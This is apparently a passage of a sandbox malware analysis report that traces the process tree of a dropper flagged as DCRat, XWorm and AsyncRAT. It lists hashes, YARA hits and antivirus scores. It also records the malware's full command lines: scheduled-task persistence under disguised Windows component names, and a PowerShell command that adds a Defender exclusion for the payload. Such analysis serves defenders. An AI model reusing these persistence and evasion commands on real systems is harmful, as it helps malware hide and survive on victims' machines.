                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000000.1327658991.0000000000EC2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000000.1327658991.0000000000EC2000.00000002.00000001.01000000.00000006.sdmp, Author: ditekSHen
                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\javaclient.exe, Author: Joe Security
                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\javaclient.exe, Author: ditekSHen
                                    Antivirus matches:
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 92%, ReversingLabs
                                    • Detection: 68%, Virustotal, Browse
                                    Reputation:low
                                    Has exited:false

                                    General

                                    Target ID:3
                                    Start time:05:51:56
                                    Start date:06/08/2024
                                    Path:C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\AppData\Local\Temp\DCRatBuild.exe"
                                    Imagebase:0xf00000
                                    File size:1'588'999 bytes
                                    MD5 hash:81A0B6CE5163BE692566FFA70F8E9839
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 70%, ReversingLabs
                                    • Detection: 59%, Virustotal, Browse
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:4
                                    Start time:05:51:56
                                    Start date:06/08/2024
                                    Path:C:\Windows\SysWOW64\wscript.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Componenthost\aZjsojBpBtPKe.vbe"
                                    Imagebase:0xd30000
                                    File size:147'456 bytes
                                    MD5 hash:FF00E0480075B095948000BDC66E81F0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    General

                                    Target ID:5
                                    Start time:05:51:57
                                    Start date:06/08/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Componenthost\N1me8mpFe7zJQMouCBhkn06ZkahUl.bat" "
                                    Imagebase:0xc50000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:6
                                    Start time:05:51:57
                                    Start date:06/08/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff70f010000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:7
                                    Start time:05:51:57
                                    Start date:06/08/2024
                                    Path:C:\Componenthost\providerreviewdhcp.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Componenthost\providerreviewdhcp.exe"
                                    Imagebase:0x850000
                                    File size:1'271'808 bytes
                                    MD5 hash:8F04E3EE4A119F4B39412E27CED12DE8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000007.00000002.1383062846.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000007.00000002.1383062846.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000007.00000002.1384672432.0000000012BEF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 88%, ReversingLabs
                                    • Detection: 68%, Virustotal, Browse
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:20
                                    Start time:05:51:59
                                    Start date:06/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "hvxmowIikyCfRrhhAMpWFavmEnuKtLh" /sc MINUTE /mo 11 /tr "'C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff707480000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:21
                                    Start time:05:51:59
                                    Start date:06/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "Memory CompressionM" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\windows defender\en-GB\Memory Compression.exe'" /f
                                    Imagebase:0x7ff707480000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:22
                                    Start time:05:51:59
                                    Start date:06/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "Memory Compression" /sc ONLOGON /tr "'C:\Program Files (x86)\windows defender\en-GB\Memory Compression.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff707480000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:23
                                    Start time:05:51:59
                                    Start date:06/08/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe'
                                    Imagebase:0x7ff760310000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:24
                                    Start time:05:51:59
                                    Start date:06/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "Memory CompressionM" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows defender\en-GB\Memory Compression.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff707480000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:25
                                    Start time:05:51:59
                                    Start date:06/08/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff70f010000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:26
                                    Start time:05:51:59
                                    Start date:06/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Mail\WmiPrvSE.exe'" /f
                                    Imagebase:0x7ff70f010000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:27
                                    Start time:05:51:59
                                    Start date:06/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\Windows Mail\WmiPrvSE.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff707480000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:28
                                    Start time:05:52:00
                                    Start date:06/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Mail\WmiPrvSE.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff707480000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:29
                                    Start time:05:52:00
                                    Start date:06/08/2024
                                    Path:C:\Users\user\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Users\user\cmd.exe
                                    Imagebase:0x100000
                                    File size:1'271'808 bytes
                                    MD5 hash:8F04E3EE4A119F4B39412E27CED12DE8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001D.00000002.1505051021.0000000002481000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 88%, ReversingLabs
                                    • Detection: 68%, Virustotal, Browse
                                    Has exited:true

                                    General

                                    Target ID:30
                                    Start time:05:52:00
                                    Start date:06/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "hvxmowIikyCfRrhhAMpWFavmEnuKtLh" /sc MINUTE /mo 8 /tr "'C:\Users\Default\PrintHood\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe'" /f
                                    Imagebase:0x7ff707480000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:31
                                    Start time:05:52:00
                                    Start date:06/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "hvxmowIikyCfRrhhAMpWFavmEnuKtL" /sc ONLOGON /tr "'C:\Users\Default\PrintHood\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff707480000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:32
                                    Start time:05:52:00
                                    Start date:06/08/2024
                                    Path:C:\Users\user\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Users\user\cmd.exe
                                    Imagebase:0xd60000
                                    File size:1'271'808 bytes
                                    MD5 hash:8F04E3EE4A119F4B39412E27CED12DE8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000020.00000002.1513885055.0000000003111000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000020.00000002.1513885055.000000000312D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Has exited:true

                                    General

                                    Target ID:33
                                    Start time:05:52:00
                                    Start date:06/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "hvxmowIikyCfRrhhAMpWFavmEnuKtLh" /sc MINUTE /mo 8 /tr "'C:\Users\Default\PrintHood\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff707480000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:36
                                    Start time:05:52:00
                                    Start date:06/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe'" /f
                                    Imagebase:0x7ff707480000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:37
                                    Start time:05:52:00
                                    Start date:06/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff707480000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:38
                                    Start time:05:52:00
                                    Start date:06/08/2024
                                    Path:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Users\Default\PrintHood\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe
                                    Imagebase:0x840000
                                    File size:1'271'808 bytes
                                    MD5 hash:8F04E3EE4A119F4B39412E27CED12DE8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000026.00000002.1482114467.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 88%, ReversingLabs
                                    • Detection: 68%, Virustotal, Browse
                                    Has exited:true

                                    General

                                    Target ID:39
                                    Start time:05:52:00
                                    Start date:06/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff707480000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:40
                                    Start time:05:52:00
                                    Start date:06/08/2024
                                    Path:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Users\Default\PrintHood\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe
                                    Imagebase:0xa50000
                                    File size:1'271'808 bytes
                                    MD5 hash:8F04E3EE4A119F4B39412E27CED12DE8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000028.00000002.1513471393.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000028.00000002.1513471393.0000000002DCF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Has exited:true

                                    General

                                    Target ID:41
                                    Start time:05:52:00
                                    Start date:06/08/2024
                                    Path:C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files (x86)\windows defender\en-GB\Memory Compression.exe"
                                    Imagebase:0x3f0000
                                    File size:1'271'808 bytes
                                    MD5 hash:8F04E3EE4A119F4B39412E27CED12DE8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000029.00000002.1518454359.0000000002771000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 88%, ReversingLabs
                                    • Detection: 68%, Virustotal, Browse
                                    Has exited:true

                                    General

                                    Target ID:42
                                    Start time:05:52:01
                                    Start date:06/08/2024
                                    Path:C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files (x86)\windows defender\en-GB\Memory Compression.exe"
                                    Imagebase:0xf00000
                                    File size:1'271'808 bytes
                                    MD5 hash:8F04E3EE4A119F4B39412E27CED12DE8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000002A.00000002.1517396761.0000000003371000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Has exited:true

                                    General

                                    Target ID:43
                                    Start time:05:52:01
                                    Start date:06/08/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8o9UezPTg6.bat"
                                    Imagebase:0x7ff660590000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:45
                                    Start time:05:52:01
                                    Start date:06/08/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff70f010000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Disassembly

                                    Reset < >

                                      Executed Functions

                                      Function 00007FF886EE0A21 Relevance: .4, Instructions: 420COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1370194354.00007FF886EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff886ee0000_cougif6lqM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e25e45da47a26e574d010c0bb7ee64ca835060570989982d59ee1f1310838d2f
                                      • Instruction ID: f7813ec2bb619d598022d576581af25caa33536d11a04ad1dba64be46921b537
                                      • Opcode Fuzzy Hash: e25e45da47a26e574d010c0bb7ee64ca835060570989982d59ee1f1310838d2f
                                      • Instruction Fuzzy Hash: 3BD19F34E189198FDB98EB68C46867977E2FF59311F200239E41ED32E6CE39AC11CB51
                                      Function 00007FF886EE03D8 Relevance: 2.6, Strings: 2, Instructions: 150COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1370194354.00007FF886EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff886ee0000_cougif6lqM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 8[$ZP^I
                                      • API String ID: 0-2417029038
                                      • Opcode ID: 0dfed62a44d7e8b90fd4731efa3515d26096ec30bb90e43c5c64f630e52540ed
                                      • Instruction ID: 6ea4d390d965c7d58531c652bb0a432091bd64a40c041c8b270acfd5acaffd3b
                                      • Opcode Fuzzy Hash: 0dfed62a44d7e8b90fd4731efa3515d26096ec30bb90e43c5c64f630e52540ed
                                      • Instruction Fuzzy Hash: 80412B12E0D6914FE25566BC78191F56F91FF62A94B6800BBD08CCB1DBED0C9C5BC392
                                      Function 00007FF886EE05BD Relevance: 1.6, Strings: 1, Instructions: 376COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1370194354.00007FF886EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff886ee0000_cougif6lqM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 3CL_^
                                      • API String ID: 0-3907758863
                                      • Opcode ID: 645104ea70e9f80286c80103104868d90bec54bffe4ed634f73d64141135a361
                                      • Instruction ID: b8527487a23124118c9cc4ab93a3f0faca9514066740527eb25073283724e3f6
                                      • Opcode Fuzzy Hash: 645104ea70e9f80286c80103104868d90bec54bffe4ed634f73d64141135a361
                                      • Instruction Fuzzy Hash: 2D41B552D0E6C24FE356567858292B87FA0BFA2394F6804FBC0898B4D3DD5D9C69C362
                                      Function 00007FF886EE063D Relevance: 1.6, Strings: 1, Instructions: 328COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1370194354.00007FF886EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff886ee0000_cougif6lqM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 3CL_^
                                      • API String ID: 0-3907758863
                                      • Opcode ID: cdfbe60dfe9dad1a80e56352b879efa94563de43072105efe826bc71a858f897
                                      • Instruction ID: 4af7326b18f1c9a207e4521af53d0a49841c0099bea0a99c4d45d9f51b7172d2
                                      • Opcode Fuzzy Hash: cdfbe60dfe9dad1a80e56352b879efa94563de43072105efe826bc71a858f897
                                      • Instruction Fuzzy Hash: AA219F11C1E6C24FE366667884292B82FA0BF92394F6800FAC0498B5D3DD1D6CA9C362
                                      Function 00007FF886EE1119 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1370194354.00007FF886EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff886ee0000_cougif6lqM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 8[
                                      • API String ID: 0-4235616482
                                      • Opcode ID: 9bedeebeab0cdde53fad1cd7a7857638923543d0c284a888334428217024abcf
                                      • Instruction ID: 8aeaa2b02bb55857e03d090efaf9f2c61b0a8d5c19430404dc0209e6a57d2b25
                                      • Opcode Fuzzy Hash: 9bedeebeab0cdde53fad1cd7a7857638923543d0c284a888334428217024abcf
                                      • Instruction Fuzzy Hash: 77016812F1C9490BE3D8A6BC68597F57BC1EFAA290F0402BAD40CC32C6DE0C9C46C351
                                      Function 00007FF886EE04B0 Relevance: 1.3, Strings: 1, Instructions: 57COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1370194354.00007FF886EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff886ee0000_cougif6lqM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 8[
                                      • API String ID: 0-4235616482
                                      • Opcode ID: 6d59c2562affa0840f0c996ad3adf939b5c810f5c3feb14dbd704e0822f6ef71
                                      • Instruction ID: ac8152a4eee1709930661cd5a0b1e9f63ff7f7b26abfa69db372f3bcf29e4037
                                      • Opcode Fuzzy Hash: 6d59c2562affa0840f0c996ad3adf939b5c810f5c3feb14dbd704e0822f6ef71
                                      • Instruction Fuzzy Hash: 1CF0C812F18C1D0BF7E8B5EC24593F563C1EBE9695F54027AE40DC3285ED0D5C468391
                                      Function 00007FF886EE13DD Relevance: .4, Instructions: 416COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1370194354.00007FF886EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff886ee0000_cougif6lqM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5def59a8665a042c8e1390b0cfb7cdd7b8d3ae0ca6c435ba8547e59e0b06696c
                                      • Instruction ID: 223ff61c495ab0f822fb20f176f527f3539cf757a5331af0de5fde7cbc763f39
                                      • Opcode Fuzzy Hash: 5def59a8665a042c8e1390b0cfb7cdd7b8d3ae0ca6c435ba8547e59e0b06696c
                                      • Instruction Fuzzy Hash: 1D510561E1CA858FE799DB7C48593B47BE2FFA9640F5901BAD04DC32D3DE289C818352
                                      Function 00007FF886EE04A8 Relevance: .2, Instructions: 176COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1370194354.00007FF886EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff886ee0000_cougif6lqM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f6062b6ad50c33c92c48416bca37f62be27b27d394cd542f91eaea944068b692
                                      • Instruction ID: 4079baf7d70ec7ac4d4b9d5dadb28e1fe02826a1d592725dcdcd17a41bd2c061
                                      • Opcode Fuzzy Hash: f6062b6ad50c33c92c48416bca37f62be27b27d394cd542f91eaea944068b692
                                      • Instruction Fuzzy Hash: A8510571E28A498BE798DF6C585D3B977E2FFA8680F584179D04DD33D2DE289C818342
                                      Function 00007FF886EE11A1 Relevance: .0, Instructions: 34COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1370194354.00007FF886EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff886ee0000_cougif6lqM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 717a925b22a2165d19221a5c8b11bf787211c79504475f2fb05f7a454a940953
                                      • Instruction ID: f3a0dc4e3612391a97eb2ebcc34f07c0faa3b20144b5bab6c8f455fff6b46ef6
                                      • Opcode Fuzzy Hash: 717a925b22a2165d19221a5c8b11bf787211c79504475f2fb05f7a454a940953
                                      • Instruction Fuzzy Hash: AFF05802C4E3D11FE3A7537828210E4BF70AE4326471D00FBC0888A09BD8095C8AC3A2
                                      Function 00007FF886EE176D Relevance: .0, Instructions: 25COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1370194354.00007FF886EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff886ee0000_cougif6lqM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c93ace3e5da228faa399226505c36bb0a56dd5d67177bfc5ea9083094dba924a
                                      • Instruction ID: a0b88f03b8520a12f9dddcc32d238ba71acf4bb40443dd84e3f3140d6a4a2adb
                                      • Opcode Fuzzy Hash: c93ace3e5da228faa399226505c36bb0a56dd5d67177bfc5ea9083094dba924a
                                      • Instruction Fuzzy Hash: FDE02B11E2EA984FD3E2D63C58551A92FF1EF8655075902EBD44EC71D3CD284C178340
                                      Function 00007FF886EE09E6 Relevance: .0, Instructions: 21COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1370194354.00007FF886EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff886ee0000_cougif6lqM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
